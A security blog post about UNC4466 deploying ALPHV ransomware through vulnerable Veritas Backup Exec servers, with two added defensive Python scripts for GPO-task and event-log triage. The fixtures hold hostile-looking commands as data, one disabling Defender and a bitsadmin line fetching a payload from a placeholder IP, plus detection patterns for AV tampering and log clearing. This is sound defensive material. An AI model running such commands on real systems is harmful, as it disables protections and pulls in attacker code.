ALPHV Ransomware Targets Vulnerable Veritas Backup Exec Installations

The emergence of UNC4466's TTPs caught the attention of experts at the cybersecurity firm Mandiant.

by Gert Van de Ven
April 10, 2023
in Articles, Cyber Attacks, Vulnerability & Weakness

The threat of ransomware has been a growing concern for organizations of all sizes and sectors, and it seems to be getting worse. The latest ransomware campaign targeting Veritas Backup Exec installations has caught the attention of cybersecurity experts. ALPHV (also known as BlackCat) ransomware is being used by a new ransomware affiliate, UNC4466, to target publicly exposed Veritas Backup Exec installations. Mandiant has observed that this affiliate is exploiting known vulnerabilities to gain initial access. In this blog post, we will cover the attack lifecycle of UNC4466, its tactics, techniques, and procedures, and provide recommendations for detection and prevention.

Timeline of Veritas Backup Exec Vulnerabilities and Exploits

In March 2021, Veritas published an advisory reporting three critical vulnerabilities in Veritas Backup Exec 16.x, 20.x and 21.x. On September 23, 2022, a Metasploit module was released which exploits these vulnerabilities and creates a session that threat actors can use to interact with the victim system. On October 22, 2022, Mandiant first observed exploitation of the Veritas vulnerabilities in the wild.

Attack Phases: Initial Compromise to Complete Mission

UNC4466 gained access to an internet-exposed Windows server, running Veritas Backup Exec version 21.0 using the Metasploit module exploit/multi/veritas/beagent_sha_auth_rce. The threat actor used ADRecon to gather network, account, and host information in the victim’s environment. UNC4466 made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor.

After gaining access to the Veritas Backup Exec server, UNC4466 used Internet Explorer to download Famatech's Advanced IP Scanner from its website. The tool scans individual IP addresses or IP address ranges for open ports and returns hostname, operating system, and hardware manufacturer information for each responding host.

UNC4466 leveraged SOCKS5 tunneling to communicate with compromised systems in the victim network. The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne, and Nanodump, to gather clear-text credentials and credential material. UNC4466 took steps to evade detection, including disabling Microsoft Defender’s real-time monitoring capability and clearing event logs.

UNC4466 deploys the Rust-based ALPHV ransomware by adding immediate tasks to the default domain policy. These tasks are configured to perform actions that disable security software, download the ALPHV encryptor, and execute it.
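The "immediate task" mechanism described above is a Group Policy Preferences feature, and the tasks it creates are written to a plain XML file in SYSVOL, so a defender can audit them. The following script is an added example, not code from the blog or from Mandiant: it parses the Group Policy Preferences scheduled-task file (ScheduledTasks.xml under a GPO's Machine\Preferences\ScheduledTasks folder) and reports ImmediateTaskV2 entries, with extra weight when the policy is the Default Domain Policy and when the command line shows the traits the article lists (AV tampering, BITS downloads, log clearing). The XML is a constructed, simplified sample of that layout, and the command lines in it are detection fixtures; the regular expressions are my own and are assumptions about what is worth a closer look, not a complete signature set.

```python
"""Hunt for Group Policy Preferences "immediate tasks" pushed to domain-joined hosts.

Added example, not code from the blog or from Mandiant. It parses the Group Policy
Preferences file in which scheduled tasks are stored (ScheduledTasks.xml under the GPO's
Machine\\Preferences\\ScheduledTasks folder in SYSVOL) and reports ImmediateTaskV2 entries,
which run once on every machine in scope at the next policy refresh. The XML below is a
constructed, simplified sample of that layout; the commands in it are detection fixtures.
"""
import re
import xml.etree.ElementTree as ET

# Well-known GUID of the Default Domain Policy, the GPO the article says UNC4466 modified.
DEFAULT_DOMAIN_POLICY = "{31B2F340-016D-11D2-945F-00C04FB984F9}"

# Constructed sample: one routine TaskV2 and two immediate tasks of the kind described
# in the article (tamper with the AV, then fetch a payload over BITS).
SAMPLE_XML = """<ScheduledTasks>
  <TaskV2 name="NightlyCleanup">
    <Properties action="C" name="NightlyCleanup" runAs="NT AUTHORITY\\System">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\\Windows\\System32\\cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 name="Update1">
    <Properties action="C" name="Update1" runAs="NT AUTHORITY\\System">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>powershell.exe</Command>
        <Arguments>-c Set-MpPreference -DisableRealtimeMonitoring $true</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <ImmediateTaskV2 name="Update2">
    <Properties action="C" name="Update2" runAs="NT AUTHORITY\\System">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>bitsadmin.exe</Command>
        <Arguments>/transfer job /download http://203.0.113.10/payload.bin C:\\ProgramData\\payload.bin</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Command-line traits worth a closer look when they appear in a GPO-delivered task
# (assumed starting set, not an exhaustive signature list).
SUSPICIOUS_PATTERNS = {
    "av-tamper": re.compile(r"Set-MpPreference|DisableRealtimeMonitoring|stop\s+WinDefend", re.I),
    "bits-download": re.compile(r"bitsadmin|Start-BitsTransfer", re.I),
    "log-clearing": re.compile(r"wevtutil\s+cl\b|Clear-EventLog", re.I),
    "remote-url": re.compile(r"https?://", re.I),
}


def extract_tasks(xml_text):
    """Return one record per task element: kind, name, run-as account, command line."""
    tasks = []
    for node in ET.fromstring(xml_text):
        props = node.find("Properties")
        cmd = node.find(".//Exec/Command")
        args = node.find(".//Exec/Arguments")
        cmdline = " ".join(e.text.strip() for e in (cmd, args) if e is not None and e.text)
        tasks.append({
            "kind": node.tag,                      # TaskV2 or ImmediateTaskV2
            "name": node.get("name"),
            "run_as": props.get("runAs") if props is not None else None,
            "cmdline": cmdline,
        })
    return tasks


def triage(tasks, policy_guid):
    """Flag immediate tasks and tasks whose command line matches a suspicious trait.

    Severity is 'high' when an immediate task also carries a suspicious command line and
    'medium' when only one of the two holds. Placement in the Default Domain Policy is
    recorded as an extra reason because that GPO reaches every host in the domain.
    """
    findings = []
    for t in tasks:
        traits = [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(t["cmdline"])]
        immediate = t["kind"] == "ImmediateTaskV2"
        if not (immediate or traits):
            continue
        reasons = (["immediate-task"] if immediate else []) + traits
        if policy_guid.upper() == DEFAULT_DOMAIN_POLICY:
            reasons.append("default-domain-policy")
        findings.append({
            "name": t["name"],
            "run_as": t["run_as"],
            "severity": "high" if immediate and traits else "medium",
            "reasons": reasons,
            "cmdline": t["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in triage(extract_tasks(SAMPLE_XML), DEFAULT_DOMAIN_POLICY):
        print(f"[{f['severity']}] {f['name']} ({', '.join(f['reasons'])}): {f['cmdline']}")
```

In a real environment, point `extract_tasks` at the ScheduledTasks.xml files of each GPO in SYSVOL and diff the output against a known-good baseline; an immediate task appearing in the Default Domain Policy outside a change window deserves attention regardless of what its command line looks like.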

Detection Opportunities and Indicators of Compromise

Defenders should monitor internet-exposed Veritas Backup Exec Windows installations, particularly those before version 21.2. Veritas Backup Exec logs record evidence of connections to remote systems, and they can also record the execution of suspicious pre- and post-backup job commands. These log files should be forwarded to a SIEM or similar technology that enables detection and alerting when such events are recorded.
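The two detection points in this section, version-based prioritisation and alerting on forwarded events, can be turned into simple triage rules. The script below is an added example, not code from the blog or from Mandiant: it ranks Backup Exec hosts below 21.2 (critical when internet-exposed), then applies event rules for the post-compromise behaviours the article attributes to UNC4466 (BITS transfers from untrusted origins, Defender real-time protection switched off, event logs cleared) and escalates any host that shows two or more of them. The Windows event IDs are the standard ones as I know them (BITS-Client 59, Defender 5001, Security 1102, System 104); the inventory, the event records and their field names are constructed, a normalisation of what a SIEM would receive rather than a Backup Exec log format, and the trusted-origin list is an assumption to be replaced with your own.

```python
"""Triage rules for the detection points above, run over constructed telemetry.

Added example, not code from the blog or from Mandiant. Two pieces: an inventory check
that prioritises Backup Exec hosts below version 21.2 (critical when internet-exposed),
and event-matching rules for the behaviours the article attributes to UNC4466 once inside:
BITS transfers from untrusted origins, Microsoft Defender real-time protection switched off,
and event logs cleared. Event IDs are the standard Windows ones as I know them (BITS-Client
59, Defender 5001, Security 1102, System 104); the records and field names are a constructed
normalisation of forwarded events, not a Backup Exec log format.
"""
from collections import defaultdict
from urllib.parse import urlparse

FIXED_VERSION = (21, 2)  # the article: prioritise installations before 21.2

# Constructed inventory of Backup Exec servers (hostnames and versions are samples).
INVENTORY = [
    {"host": "bkp01", "version": "21.0.1200", "internet_exposed": True},
    {"host": "bkp02", "version": "21.2.1200", "internet_exposed": True},
    {"host": "bkp03", "version": "20.0.1188", "internet_exposed": False},
]

# Constructed forwarded events; 203.0.113.10 is a documentation address, not a real IoC.
EVENTS = [
    {"host": "bkp01", "channel": "Microsoft-Windows-Bits-Client/Operational", "id": 59,
     "data": {"url": "http://203.0.113.10/tools.zip", "job": "j1"}},
    {"host": "bkp01", "channel": "Microsoft-Windows-Bits-Client/Operational", "id": 59,
     "data": {"url": "https://download.windowsupdate.com/update.cab", "job": "WU"}},
    {"host": "bkp01", "channel": "Microsoft-Windows-Windows Defender/Operational", "id": 5001, "data": {}},
    {"host": "bkp01", "channel": "Security", "id": 1102, "data": {"subject": "CORP\\svc_backup"}},
    {"host": "ws07", "channel": "System", "id": 104, "data": {"subject": "CORP\\helpdesk"}},
]


def parse_version(text):
    """'21.0.1200' -> (21, 0, 1200); tuples compare component-wise."""
    return tuple(int(p) for p in text.split("."))


def is_unpatched(version):
    return parse_version(version) < FIXED_VERSION


def prioritise_inventory(inventory):
    """Return (host, priority) for every unpatched host, internet-exposed ones first."""
    ranked = []
    for h in inventory:
        if is_unpatched(h["version"]):
            ranked.append((h["host"], "critical" if h["internet_exposed"] else "high"))
    return sorted(ranked, key=lambda r: r[1] != "critical")  # stable: critical first


# Assumed allowlist of download origins that BITS legitimately talks to; adapt per site.
TRUSTED_ORIGINS = (".microsoft.com", ".windowsupdate.com")


def untrusted_origin(url):
    host = (urlparse(url).hostname or "").lower()
    return not any(host == d.lstrip(".") or host.endswith(d) for d in TRUSTED_ORIGINS)


# (channel, event id, predicate on the event's data, tag)
RULES = [
    ("Microsoft-Windows-Bits-Client/Operational", 59,
     lambda d: untrusted_origin(d.get("url", "")), "bits-untrusted-download"),
    ("Microsoft-Windows-Windows Defender/Operational", 5001, lambda d: True, "defender-realtime-disabled"),
    ("Security", 1102, lambda d: True, "event-log-cleared"),
    ("System", 104, lambda d: True, "event-log-cleared"),
]


def match_events(events):
    """Return {host: set(tags)} for every event that hits a rule."""
    hits = defaultdict(set)
    for ev in events:
        for channel, event_id, pred, tag in RULES:
            if ev["channel"] == channel and ev["id"] == event_id and pred(ev.get("data", {})):
                hits[ev["host"]].add(tag)
    return dict(hits)


def escalate(hits, threshold=2):
    """Hosts showing at least `threshold` distinct tradecraft tags: treat as hands-on-keyboard activity."""
    return sorted(h for h, tags in hits.items() if len(tags) >= threshold)


if __name__ == "__main__":
    print("patch priority:", prioritise_inventory(INVENTORY))
    hits = match_events(EVENTS)
    print("rule hits:", {h: sorted(t) for h, t in hits.items()})
    print("escalate:", escalate(hits))
```

Single rule hits are noisy on their own (administrators clear logs and tune Defender), which is why the escalation step counts distinct tags per host; in production, add a time window to that grouping and join the escalated hosts against the patch-priority list so an unpatched, exposed Backup Exec server with fresh tradecraft hits sits at the top of the queue.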

Full IoCs are provided in the Mandiant article.

Mitigation Recommendations

Organizations should inventory externally facing services and reduce the attack surface available to attackers. Implementing secure access controls, segmenting networks, enabling multi-factor authentication, and regularly testing and evaluating backup strategies to limit the impact of a ransomware attack are critical. In addition, it is recommended to conduct frequent vulnerability scans and penetration testing of externally facing systems to identify and remediate vulnerabilities proactively.

Conclusion

ALPHV ransomware (also known as BlackCat ransomware) has been observed targeting vulnerable installations of Veritas Backup Exec that are publicly exposed to the internet. The threat actor behind the ransomware has been tracked as UNC4466 and primarily gains access through known vulnerabilities. The attack lifecycle, indicators, and detection opportunities have been covered in this blog post. Defenders should prioritize monitoring internet-exposed Veritas Backup Exec installations for versions before 21.2 and monitor the Backup Exec log files for any suspicious activity.
